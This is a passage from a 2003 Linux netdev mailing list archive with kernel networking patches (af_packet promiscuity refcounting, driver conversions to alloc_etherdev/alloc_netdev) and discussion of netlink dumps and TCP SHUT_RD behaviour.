dev promiscuity is > left at -1. > > I can't see any reason to be mucking about with the device promiscuity > on NETDEV_DOWN and NETDEV_UP events in the first place. The attached > patch seems to fix all the cases I can think of. It works properly in > both of the above cases, and has also been verified to do the right > thing with NETDEV_UNREGISTER events. > > Jason > Index: linux-2.4/net/packet/af_packet.c =================================================================== RCS file: /home/cvs/linux-2.4/net/packet/af_packet.c,v retrieving revision 1.11 diff -u -p -r1.11 af_packet.c --- linux-2.4/net/packet/af_packet.c 12 Jun 2002 23:10:34 -0000 1.11 +++ linux-2.4/net/packet/af_packet.c 1 Jul 2003 20:17:51 -0000 @@ -1378,8 +1378,13 @@ static int packet_notifier(struct notifi po = sk->protinfo.af_packet; switch (msg) { - case NETDEV_DOWN: case NETDEV_UNREGISTER: +#ifdef CONFIG_PACKET_MULTICAST + if (po->mclist) + packet_dev_mclist(dev, po->mclist, -1); + // fallthrough +#endif + case NETDEV_DOWN: if (dev->ifindex == po->ifindex) { spin_lock(&po->bind_lock); if (po->running) { @@ -1396,10 +1401,6 @@ static int packet_notifier(struct notifi } spin_unlock(&po->bind_lock); } -#ifdef CONFIG_PACKET_MULTICAST - if (po->mclist) - packet_dev_mclist(dev, po->mclist, -1); -#endif break; case NETDEV_UP: spin_lock(&po->bind_lock); @@ -1409,10 +1410,6 @@ static int packet_notifier(struct notifi po->running = 1; } spin_unlock(&po->bind_lock); -#ifdef CONFIG_PACKET_MULTICAST - if (po->mclist) - packet_dev_mclist(dev, po->mclist, +1); -#endif break; } } From shemminger@osdl.org Tue Jul 8 15:12:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:13:01 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MCr2x003279 for ; Tue, 8 Jul 2003 15:12:54 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h68MCjI08162; Tue, 8 Jul 2003 15:12:46 -0700 Date: Tue, 8 Jul 2003 15:12:45 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: [PATCH 2.5.74] convert apne to dynamic allocation Message-Id: <20030708151245.179cac2b.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3839 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Convert apne driver away from static net_device structure. Builds, but not tested with real hardware. diff -Nru a/drivers/net/apne.c b/drivers/net/apne.c --- a/drivers/net/apne.c Mon Jul 7 14:46:31 2003 +++ b/drivers/net/apne.c Mon Jul 7 14:46:31 2003 @@ -534,16 +534,21 @@ } #ifdef MODULE -static struct net_device apne_dev; +static struct net_device *apne_dev; int init_module(void) { int err; + apne_dev = kmalloc(sizeof(*apne_dev)); + if (!apne_dev) + return -ENOMEM; + apne_dev.init = apne_probe; if ((err = register_netdev(&apne_dev))) { if (err == -EIO) printk("No PCMCIA NEx000 ethernet card found.\n"); + kfree(apne_dev); return (err); } return (0); @@ -551,11 +556,13 @@ void cleanup_module(void) { - unregister_netdev(&apne_dev); + unregister_netdev(apne_dev); pcmcia_disable_irq(); - free_irq(IRQ_AMIGA_PORTS, &apne_dev); + free_irq(IRQ_AMIGA_PORTS, apne_dev); + + kfree(apne_dev); pcmcia_reset(); From shemminger@osdl.org Tue Jul 8 15:14:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:14:39 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MEY2x003871 for ; Tue, 8 Jul 2003 15:14:34 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h68MESI08466; Tue, 8 Jul 2003 15:14:28 -0700 Date: Tue, 8 Jul 2003 15:14:27 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: [PATCH] Convert hp100 to useing alloc_etherdev Message-Id: <20030708151427.328aae38.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3841 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Change hp100 driver to using alloc_etherdev instead of separate allocation of dev->priv. Builds, but not tested since do not have hardware. diff -Nru a/drivers/net/hp100.c b/drivers/net/hp100.c --- a/drivers/net/hp100.c Mon Jul 7 14:49:18 2003 +++ b/drivers/net/hp100.c Mon Jul 7 14:49:18 2003 @@ -713,11 +713,8 @@ } /* Initialise the "private" data structure for this card. */ - if ((dev->priv = kmalloc(sizeof(struct hp100_private), GFP_KERNEL)) == NULL) - return -ENOMEM; - lp = (struct hp100_private *) dev->priv; - memset(lp, 0, sizeof(struct hp100_private)); + spin_lock_init(&lp->lock); lp->id = eid; lp->chip = chip; @@ -777,7 +774,6 @@ SET_MODULE_OWNER(dev); SET_NETDEV_DEV(dev, &pci_dev->dev); - ether_setup(dev); /* If busmaster mode is wanted, a dma-capable memory area is needed for * the rx and tx PDLs @@ -2963,8 +2959,6 @@ pci_free_consistent(p->pci_dev, MAX_RINGSIZE + 0x0f, p->page_vaddr_algn, virt_to_whatever(d, p->page_vaddr_algn)); if (p->mem_ptr_virt) iounmap(p->mem_ptr_virt); - kfree(d->priv); - d->priv = NULL; kfree(d); hp100_devlist[i] = NULL; } @@ -2983,9 +2977,10 @@ cards = 0; while ((hp100_port[++i] != -1) && (i < HP100_DEVICES)) { /* Create device and set basics args */ - hp100_devlist[i] = kmalloc(sizeof(struct net_device), GFP_KERNEL); + hp100_devlist[i] = alloc_etherdev(sizeof(struct hp100_private)); if (!hp100_devlist[i]) goto fail; + memset(hp100_devlist[i], 0x00, sizeof(struct net_device)); #if LINUX_VERSION_CODE >= 0x020362 /* 2.3.99-pre7 */ memcpy(hp100_devlist[i]->name, hp100_name[i], IFNAMSIZ); /* Copy name */ @@ -2998,7 +2993,6 @@ /* Try to create the device */ if (register_netdev(hp100_devlist[i]) != 0) { /* DeAllocate everything */ - /* Note: if dev->priv is mallocated, there is no way to fail */ kfree(hp100_devlist[i]); hp100_devlist[i] = (struct net_device *) NULL; } else From shemminger@osdl.org Tue Jul 8 15:16:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:16:22 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MGI2x004229 for ; Tue, 8 Jul 2003 15:16:18 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h68MG6I08876; Tue, 8 Jul 2003 15:16:06 -0700 Date: Tue, 8 Jul 2003 15:16:06 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: [PATCH] Message-Id: <20030708151606.483604ad.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3842 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Convert Digi RigtSwitch to use alloc_etherdev. Builds (on 2.5.74) but once again, do not have real hardware to test. diff -Nru a/drivers/net/dgrs.c b/drivers/net/dgrs.c --- a/drivers/net/dgrs.c Mon Jul 7 14:50:36 2003 +++ b/drivers/net/dgrs.c Mon Jul 7 14:50:36 2003 @@ -1252,18 +1252,12 @@ { DGRS_PRIV *priv; struct net_device *dev, *aux; - - /* Allocate and fill new device structure. */ - int dev_size = sizeof(struct net_device) + sizeof(DGRS_PRIV); int i, ret; - dev = (struct net_device *) kmalloc(dev_size, GFP_KERNEL); - + dev = alloc_etherdev(sizeof(DGRS_PRIV)); if (!dev) return -ENOMEM; - memset(dev, 0, dev_size); - dev->priv = ((void *)dev) + sizeof(struct net_device); priv = (DGRS_PRIV *)dev->priv; dev->base_addr = io; @@ -1279,7 +1273,7 @@ dev->init = dgrs_probe1; SET_MODULE_OWNER(dev); - ether_setup(dev); + if (register_netdev(dev) != 0) { kfree(dev); return -EIO; @@ -1302,15 +1296,18 @@ struct net_device *devN; DGRS_PRIV *privN; /* Allocate new dev and priv structures */ - devN = (struct net_device *) kmalloc(dev_size, GFP_KERNEL); - /* Make it an exact copy of dev[0]... */ + devN = alloc_etherdev(sizeof(DGRS_PRIV)); ret = -ENOMEM; if (!devN) goto fail; - memcpy(devN, dev, dev_size); - memset(devN->name, 0, sizeof(devN->name)); - devN->priv = ((void *)devN) + sizeof(struct net_device); + + /* Make it an exact copy of dev[0]... */ + *devN = *dev; + + /* copy the priv structure of dev[0] */ privN = (DGRS_PRIV *)devN->priv; + *privN = *priv; + /* ... and zero out VM areas */ privN->vmem = 0; privN->vplxdma = 0; @@ -1318,9 +1315,11 @@ devN->irq = 0; /* ... and base MAC address off address of 1st port */ devN->dev_addr[5] += i; + /* ... choose a new name */ + strncpy(devN->name, "eth%d", IFNAMSIZ); devN->init = dgrs_initclone; SET_MODULE_OWNER(devN); - ether_setup(devN); + ret = -EIO; if (register_netdev(devN)) { kfree(devN); From davem@redhat.com Tue Jul 8 15:16:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:16:51 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MGk2x004440 for ; Tue, 8 Jul 2003 15:16:47 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id PAA21157; Tue, 8 Jul 2003 15:08:36 -0700 Date: Tue, 08 Jul 2003 15:08:35 -0700 (PDT) Message-Id: <20030708.150835.78728697.davem@redhat.com> To: willy@debian.org Cc: greearb@candelatech.com, netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops From: "David S. Miller" In-Reply-To: <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3843 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Matthew Wilcox Date: Tue, 8 Jul 2003 22:25:51 +0100 On Tue, Jul 08, 2003 at 01:44:32PM -0700, Ben Greear wrote: > Some of these are missing their netdevice arg? > >+ int (*get_regs_len)(struct ethtool_regs *); > >+ int (*self_test_len)(struct ethtool_test *); > >+ int (*get_strings_len)(struct ethtool_gstrings *); > >+ int (*get_stats_len)(struct ethtool_stats *); Well, they don't actually need it -- these are more attributes of the underlying driver than they are of any individual network device. Not true, at least for the regs len different variants of the same chip can have a different sized register set. From shemminger@osdl.org Tue Jul 8 15:17:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 15:17:55 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68MHo2x004870 for ; Tue, 8 Jul 2003 15:17:51 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h68MHgI10146; Tue, 8 Jul 2003 15:17:42 -0700 Date: Tue, 8 Jul 2003 15:17:42 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: netdev@oss.sgi.com Subject: [PATCH] convert plip to alloc_netdev Message-Id: <20030708151742.715ca49c.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3844 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev This converts the parallel network driver to use alloc_netdev instead of doing it's own allocation. Tested (load/unload) on 2.5.74 diff -Nru a/drivers/net/plip.c b/drivers/net/plip.c --- a/drivers/net/plip.c Tue Jul 8 15:07:44 2003 +++ b/drivers/net/plip.c Tue Jul 8 15:07:44 2003 @@ -277,27 +277,10 @@ then calls us here. */ -int __init -plip_init_dev(struct net_device *dev, struct parport *pb) +static int +plip_init_netdev(struct net_device *dev) { - struct net_local *nl; - struct pardevice *pardev; - - SET_MODULE_OWNER(dev); - dev->irq = pb->irq; - dev->base_addr = pb->base; - - if (pb->irq == -1) { - printk(KERN_INFO "plip: %s has no IRQ. Using IRQ-less mode," - "which is fairly inefficient!\n", pb->name); - } - - pardev = parport_register_device(pb, dev->name, plip_preempt, - plip_wakeup, plip_interrupt, - 0, dev); - - if (!pardev) - return -ENODEV; + struct net_local *nl = dev->priv; printk(KERN_INFO "%s", version); if (dev->irq != -1) @@ -307,9 +290,6 @@ printk(KERN_INFO "%s: Parallel port at %#3lx, not using IRQ.\n", dev->name, dev->base_addr); - /* Fill in the generic fields of the device structure. */ - ether_setup(dev); - /* Then, override parts of it */ dev->hard_start_xmit = plip_tx_packet; dev->open = plip_open; @@ -322,22 +302,12 @@ memset(dev->dev_addr, 0xfc, ETH_ALEN); /* Set the private structure */ - dev->priv = kmalloc(sizeof (struct net_local), GFP_KERNEL); - if (dev->priv == NULL) { - printk(KERN_ERR "%s: out of memory\n", dev->name); - parport_unregister_device(pardev); - return -ENOMEM; - } - memset(dev->priv, 0, sizeof(struct net_local)); - nl = (struct net_local *) dev->priv; - nl->orig_hard_header = dev->hard_header; dev->hard_header = plip_hard_header; nl->orig_hard_header_cache = dev->hard_header_cache; dev->hard_header_cache = plip_hard_header_cache; - nl->pardev = pardev; nl->port_owner = 0; @@ -1299,29 +1269,52 @@ * available to use. */ static void plip_attach (struct parport *port) { - static int i; + static int unit; + struct net_device *dev; + struct net_local *nl; + char name[IFNAMSIZ]; if ((parport[0] == -1 && (!timid || !port->devices)) || plip_searchfor(parport, port->number)) { - if (i == PLIP_MAX) { + if (unit == PLIP_MAX) { printk(KERN_ERR "plip: too many devices\n"); return; } - dev_plip[i] = kmalloc(sizeof(struct net_device), - GFP_KERNEL); - if (!dev_plip[i]) { + + sprintf(name, "plip%d", unit); + dev = alloc_netdev(sizeof(struct net_local), name, + ether_setup); + if (!dev) { printk(KERN_ERR "plip: memory squeeze\n"); return; } - memset(dev_plip[i], 0, sizeof(struct net_device)); - sprintf(dev_plip[i]->name, "plip%d", i); - dev_plip[i]->priv = port; - if (plip_init_dev(dev_plip[i],port) || - register_netdev(dev_plip[i])) { - kfree(dev_plip[i]); - dev_plip[i] = NULL; + + dev->init = plip_init_netdev; + + SET_MODULE_OWNER(dev); + dev->irq = port->irq; + dev->base_addr = port->base; + if (port->irq == -1) { + printk(KERN_INFO "plip: %s has no IRQ. Using IRQ-less mode," + "which is fairly inefficient!\n", port->name); + } + + nl = dev->priv; + nl->pardev = parport_register_device(port, name, plip_preempt, + plip_wakeup, plip_interrupt, + 0, dev); + + if (!nl->pardev) { + printk(KERN_ERR "%s: parport_register failed\n", name); + kfree(dev); + return; + } + + if (register_netdev(dev)) { + printk(KERN_ERR "%s: network register failed\n", name); + kfree(dev); } else { - i++; + dev_plip[unit++] = dev; } } } @@ -1341,20 +1334,19 @@ static void __exit plip_cleanup_module (void) { + struct net_device *dev; int i; parport_unregister_driver (&plip_driver); for (i=0; i < PLIP_MAX; i++) { - if (dev_plip[i]) { - struct net_local *nl = - (struct net_local *)dev_plip[i]->priv; - unregister_netdev(dev_plip[i]); + if ((dev = dev_plip[i])) { + struct net_local *nl = dev->priv; + unregister_netdev(dev); if (nl->port_owner) parport_release(nl->pardev); parport_unregister_device(nl->pardev); - kfree(dev_plip[i]->priv); - kfree(dev_plip[i]); + kfree(dev); dev_plip[i] = NULL; } } From garzik@gtf.org Tue Jul 8 16:26:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 16:26:55 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68NQe2x005707 for ; Tue, 8 Jul 2003 16:26:40 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id B2A996655; Tue, 8 Jul 2003 19:26:34 -0400 (EDT) Date: Tue, 8 Jul 2003 19:26:34 -0400 From: Jeff Garzik To: torvalds@osdl.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [BK PATCHES] net driver merges Message-ID: <20030708232634.GA29175@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 3846 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev (note to others -- more coming, the queue isn't empty yet) Linus, please do a bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.5 Others may download ftp://ftp.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.5/2.5.74-bk5-netdrvr1.patch.bz2 This will update the following files: drivers/net/8139too.c | 2 drivers/net/e1000/e1000.h | 1 drivers/net/e1000/e1000_ethtool.c | 5 - drivers/net/e1000/e1000_hw.c | 59 ++++++++++-- drivers/net/e1000/e1000_hw.h | 18 +++ drivers/net/e1000/e1000_main.c | 186 ++++++++++++++++++++------------------ drivers/net/via-rhine.c | 36 +++++-- 7 files changed, 198 insertions(+), 109 deletions(-) through these ChangeSets: (03/07/08 1.1431) [e1000] misc cleanup * whitespace cleanup * removal of unused members of netdev priv struct * extendable arrangement of h/w reset logic (03/07/08 1.1430) [e1000] s/int/unsigned int/ for descriptor ring indexes * Perf cleanup: s/int/unsigned int/ for descriptor ring indexes [suggestion by Jeff Garzik]. * Perf cleanup: cache references to ring elements using local pointer (03/07/08 1.1429) [e1000] h/w workaround for mis-fused parts * h/w workaround: several 10's of thousands of 82547 controllers where mis-fused during manufacturing, resulting in PHY Tx amplitude to be too high and out of spec. This workaround detects those parts, and compensates the Tx amplitude by subtracting ~80mV. (03/07/08 1.1428) [e1000] ethtool diag cleanup * Cleanup: ethtool diags: only reset if not if_running. (03/07/08 1.1427) [e1000] alloc_etherdev failure didn't cleanup regions * Bug fix: alloc_etherdev failure didn't cleanup regions in probe. (03/07/08 1.1426) [e1000] missing Tx cleanup opportunities during intr handling * Bug fix: missing Tx cleanup opportunities during interrupt handling. (03/07/08 1.1425) [e1000] fix VLAN support on PPC64 * Bug fix: fix VLAN support on PPC64 [Mark Rakes (mrakes@vivato.net)] (03/07/08 1.1424) [e1000] request_irq() failure resulted in freeing twice * Bug fix: request_irq() failure resulted in freeing resources twice! [Don Fry (brazilnut@us.ibm.com)] (03/07/08 1.1423) [PATCH] via-rhine 1.18-2.5: Fix Rhine-I regression This patch addresses a minor regression reported by Rhine-I users (leading to occasional Tx timeouts). I also merged some cosmetic changes. (03/07/05 1.1422) [netdrvr 8139too] fix debug printk printk args had been accidentally reversed From davem@redhat.com Tue Jul 8 16:26:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 16:26:53 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68NQa2x005708 for ; Tue, 8 Jul 2003 16:26:36 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id QAA21406; Tue, 8 Jul 2003 16:18:18 -0700 Date: Tue, 08 Jul 2003 16:18:18 -0700 (PDT) Message-Id: <20030708.161818.28806942.davem@redhat.com> To: lunz@falooley.org Cc: netdev@oss.sgi.com, jmorris@intercode.com.au Subject: Re: [PATCH RESEND 2.4, 2.5] dev->promiscuity refcounting broken in af_packet.c From: "David S. Miller" In-Reply-To: <20030708221239.GA20633@orr.falooley.org> References: <20030708221239.GA20633@orr.falooley.org> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3845 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Jason Lunz Date: Tue, 8 Jul 2003 18:12:39 -0400 James, I know you applied it to your bk tree. Will that be enough to get it into 2.4 and 2.5, or should I submit it elsewhere? We're just waiting for me to catchup to my backlog from my vacation and push James's tree(s) to Marcelo and Linus. Please be patient! :-) From kuznet@ms2.inr.ac.ru Tue Jul 8 16:52:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 16:52:16 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Nq32x006471 for ; Tue, 8 Jul 2003 16:52:04 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA13835; Wed, 9 Jul 2003 03:50:59 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307082350.DAA13835@dub.inr.ac.ru> Subject: Re: Question about netlink To: krkumar@us.ibm.com (Krishna Kumar) Date: Wed, 9 Jul 2003 03:50:54 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com In-Reply-To: <3F0B294A.9060302@us.ibm.com> from "Krishna Kumar" at Jul 08, 2003 01:27:54 PM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3847 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > These routines 'get' the value of args[0] and then 'set' it to the resultant value. How is > this value set in the first place to the user provided value ? It is not. Zero values means that dump starts from the very beginning. It is supposed to be done at the first entry to the ->dump(), but selective dumps are not implemented in the most of ->dump() methods. > missing something or is 'args' not intended for user specified arguments ? If so, how > should we access the arguments passed by the user ? The pointer to nlmsg header is kept in cb->nlh. So, you can refer to it to get user supplied values of selector to rewind the dump to required point at the first entry or to select some specific entries while scanning a table. F.e. look into sch_api.c:tc_dump_tclass(), it scopes dump to a netdevice (tcp_ifindex), and filters answers to a specific qdisc (tcp_parent). It is also partial. More finegrain selection is not required, but desired, feel free to implement. F.e. implementation of "ip route ls root 3ffe::/24", which translates to selection of a root node for fib6_walk() to a more specific place and filtering out some nodes while walking, would be cool. Alexey From davem@redhat.com Tue Jul 8 19:38:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 19:39:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h692cr2x008445 for ; Tue, 8 Jul 2003 19:38:54 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id TAA21827; Tue, 8 Jul 2003 19:30:08 -0700 Date: Tue, 08 Jul 2003 19:30:07 -0700 (PDT) Message-Id: <20030708.193007.26293028.davem@redhat.com> To: jmorris@intercode.com.au Cc: kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: [PATCH] Don't call request_module() under spinlock in xfrm_get_type() From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3848 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: James Morris Date: Sun, 6 Jul 2003 22:42:40 +1000 (EST) This patch fixes a problem where request_module() was being called under the lock taken in xfrm_policy_get_afinfo(). Looks good, applied. From mtk-lists@gmx.net Wed Jul 9 03:12:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 03:12:43 -0700 (PDT) Received: from mx0.gmx.net (mx0.gmx.de [213.165.64.100]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69ABP2x016225 for ; Wed, 9 Jul 2003 03:12:06 -0700 Received: (qmail 14055 invoked by uid 0); 9 Jul 2003 10:11:19 -0000 Date: Wed, 9 Jul 2003 12:11:19 +0200 (MEST) From: mtk-lists@gmx.net To: kuznet@ms2.inr.ac.ru, Andi Kleen Cc: netdev@oss.sgi.com MIME-Version: 1.0 Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? X-Priority: 3 (Normal) X-Authenticated-Sender: #0018454895@gmx.net X-Authenticated-IP: [212.18.21.202] Message-ID: <27451.1057745479@www2.gmx.net> X-Mailer: WWW-Mail 1.6 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-archive-position: 3849 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mtk-lists@gmx.net Precedence: bulk X-list: netdev Hello Alexey and Andi, [Alexey] > > blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, > > HP/UX 11 and Solaris 8. Have I misunderstood Stevens, > > Most likely, it is that rare case when Stevens forgot to check the > statement. yes, it cerainly doesn't correspond to any current implementation that I could find anyway. I should of course have added that (as you are probably well aware) SUSv3 is vague but does say: SHUT_RD Disables further receive operations. which suggest that we shouldn't be able to read any more. It seems to me that the only ways of satisfying that requirement are to either discard data (a la Stevens) or send an RST to the writing peer (more on that in a moment) so that it stops sending. > From viewpoint of TCP the behaviour described in Stevens' book > is highly unnatural. SHUT_RD on TCP does not make any sense. A while back I had some communication with Andi Kleen on this point, and he suggested that the TCP could send an RST in this case, much as occurs if the reader close()s the socket. Is this not a starter? (Maybe not, for the reasons Andi outlined in his mail to this list -- quoted below.) > > described here. But, why do things happen in this way on Linux? > > Actually, you could check one more thing. What does happen after freebsd > 4.8 returns 0 on read()? Does it open window eventually? I'm not quite sure what you mean here. Can you elaborate on the what type of experiment I should perform and what you expect I might see? [Andi] > > 1. If we perform a read() on the socket and there is no data, then 0 > > (EOF) is (immediately) returned. (This is what I expected.) > > > > 2. However, the peer can still write() to the socket, and afterwards we > > can read() that data from the socket, even though the reading half of the > > socket should be shut down. Instead of this behaviour, I expected the > > read() to continue to return 0 as in point 1. This is what we see for > > example in FreeBSD 4.8, Tru64 5.1B, and HP/UX 11. > > The problem is that it adds a new check to the input path. It's not clear > how the check can be done outside the fast path (one way would be to shrink > the window forcedly and drop the receiver into slow path, but that would be > a severe protocol violation if the shrunk window leaks out with some ACK). > I don't think it's a good idea to add a check for such an obscure situation > to the fast path. Andi, I noted already your idea about delivering a RST in this case. I assume the above is the practical reason that makes implementing this difficult? > > 3. (A side point.) Looking at Stevens UNPv1, 